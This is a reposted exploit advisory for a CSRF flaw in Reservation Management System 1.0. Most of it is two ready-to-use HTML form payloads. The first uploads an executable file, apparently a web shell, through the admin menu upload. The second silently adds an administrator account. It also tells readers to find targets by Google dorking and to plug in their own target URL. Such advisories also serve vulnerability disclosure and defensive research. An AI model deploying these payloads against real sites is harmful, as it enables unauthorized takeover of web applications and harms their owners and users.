Security
Headlines
HeadlinesLatestCVEs

Headline

Reservation Management System 1.0 Cross Site Request Forgery

Reservation Management System version 1.0 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : Reservation Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Line 8 : Set your target url

[+] save payload as poc.html

[+] payload :

<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New Menu</h4>
</div>
<div class="modal-body">
<!–start form–>
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Menu Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Category</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="cat" required="">
<option value="9">Dessert</option>
<option value="6">Main Course</option>
<option value="7">Pasta</option>
<option value="10">Rice</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Subcategory</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="subcat">
<option>Drinks</option>
<option>Lunch and Dinner</option>
<option>Mirienda</option>
<option>Non Combo Meal</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Description</label>
<div class="col-lg-8">
<textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Price</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Image</label>
<div class="col-lg-8">
<input type="file" class="form-control" name="image" id="title">
</div>
</div>

              <!-- Buttons -->  
              <div class="form-group">  
                  <!-- Buttons -->  
                  <div class="col-lg-offset-2 col-lg-6">  
                    <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                    <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                   </div>  
              </div>  
          </form>  
          <!--end form-->  
        </div>

                </div>

[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php

-----------[+] Part 02 Add Admin [+]-------------------

[+] Line 8 : Set your target url

[+] save payload as poc.html

[+] payload :

<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New User</h4>
</div>
<div class="modal-body">
<!–start form–>
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Full Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="username">Username</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="password">Password</label>
<div class="col-lg-8">
<input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">
</div>
</div>

                                                                  <!-- Buttons -->  
              <div class="form-group">  
                  <!-- Buttons -->  
                  <div class="col-lg-offset-2 col-lg-6">  
                    <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                    <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                   </div>  
              </div>  
          </form>  
          <!--end form-->  
        </div>

                </div>  

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution